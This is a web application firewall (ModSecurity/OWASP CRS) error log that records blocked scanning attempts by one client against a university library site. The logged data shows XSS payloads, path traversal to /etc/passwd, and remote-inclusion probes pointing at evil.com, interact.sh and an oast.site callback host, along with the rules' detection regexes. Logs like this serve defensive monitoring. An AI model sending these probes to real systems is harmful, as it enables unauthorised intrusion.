[Tue Aug 29 11:55:29.854430 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAoz8GsAAAAS"]
[Tue Aug 29 11:55:30.546627 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAoz8G8AAAAS"]
[Tue Aug 29 11:55:30.672152 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApHRhQAAAAP"]
[Tue Aug 29 11:55:31.643457 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAqY6FEAAAAr"]
[Tue Aug 29 11:55:32.615307 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAApbUjIAAAAh"]
[Tue Aug 29 11:55:33.860219 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAAqY6GEAAAAr"]
[Tue Aug 29 11:55:35.753120 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAolKs8AAAAe"]
[Tue Aug 29 11:55:36.261220 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq4fU0AAAAJ"]
[Tue Aug 29 11:55:36.537528 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAoz8IUAAAAS"]
[Tue Aug 29 11:55:37.536830 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAAq5@CcAAAAK"]
[Tue Aug 29 11:55:37.727196 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:q: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ScCo-f0AAAq3a5YAAAAI"]
[Tue Aug 29 11:55:37.814921 2023] [:error] [pid 2744] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16ScCo-f0AAAq4fVYAAAAJ"]
[Tue Aug 29 11:55:38.584449 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:subpage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:subpage: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/WebMstr7/servlet/mstrWeb"] [unique_id "ZO16SsCo-f0AAAq3a5wAAAAI"]
[Tue Aug 29 11:55:39.875772 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at REQUEST_COOKIES:svpnlang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within REQUEST_COOKIES:svpnlang: <script>alert('document.domain')</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wnm/login/login.json"] [unique_id "ZO16S8Co-f0AAAqeFY0AAAAx"]
[Tue Aug 29 11:55:41.852824 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:link_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:link_url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/Ajax_url_encode.php"] [unique_id "ZO16TcCo-f0AAAqSwyQAAAAN"]
[Tue Aug 29 11:55:43.920857 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:port. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:port: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/fw/syslogViewer.do"] [unique_id "ZO16T8Co-f0AAAqSwy4AAAAN"]
[Tue Aug 29 11:55:43.977409 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:keyword. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:keyword: \\x22><script>alert(1337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/sell-media-search/"] [unique_id "ZO16T8Co-f0AAAqY6HYAAAAr"]
[Tue Aug 29 11:55:44.564453 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:cid: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/component/music/album.html"] [unique_id "ZO16UMCo-f0AAAqeFaYAAAAx"]
[Tue Aug 29 11:55:44.628284 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:nodatamsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:nodatamsg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html"] [unique_id "ZO16UMCo-f0AAAqY6HsAAAAr"]
[Tue Aug 29 11:55:45.799050 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UcCo-f0AAAq5@FIAAAAK"]
[Tue Aug 29 11:55:46.531906 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16UsCo-f0AAAqSwz4AAAAN"]
[Tue Aug 29 11:55:46.622125 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/printenv.shtml"] [unique_id "ZO16UsCo-f0AAAq@sZUAAAAM"]
[Tue Aug 29 11:55:46.632668 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/redirector.php"] [unique_id "ZO16UsCo-f0AAApbUoEAAAAh"]
[Tue Aug 29 11:55:46.732299 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:login[password]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:login[password]: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilibft.unla.ac.id"] [uri "/appliance/login.ns"] [unique_id "ZO16UsCo-f0AAAqTvyIAAAAa"]
[Tue Aug 29 11:55:47.768598 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/shib_logout.php"] [unique_id "ZO16U8Co-f0AAApbUooAAAAh"]
[Tue Aug 29 11:55:48.563547 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS_NAMES:<script>alert(35587703)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS_NAMES:<script>alert(35587703)</script>: <script>alert(35587703)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/ssi/printenv.shtml"] [unique_id "ZO16VMCo-f0AAAq-HYwAAAAT"]
[Tue Aug 29 11:55:48.701123 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://example.com found within TX:1: example.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/ilias/shib_logout.php"] [unique_id "ZO16VMCo-f0AAAq-HY8AAAAT"]
[Tue Aug 29 11:55:52.007357 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:login: \\x5c\\x22 onfocus=alert(document.domain); autofocus \\x5c\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/webshell4/login.php"] [unique_id "ZO16WMCo-f0AAAolKx4AAAAe"]
[Tue Aug 29 11:55:52.015720 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16WMCo-f0AAAqeFdIAAAAx"]
[Tue Aug 29 11:55:52.264456 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb09aw6t968ddtck.oast.site found within TX:1: cjmnijtjmimvgniikdb09aw6t968ddtck.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibft.unla.ac.id"] [uri "/umbraco/BackOffice/Api/Help/GetContextHelpForPage"] [unique_id "ZO16WMCo-f0AAApbUqQAAAAh"]
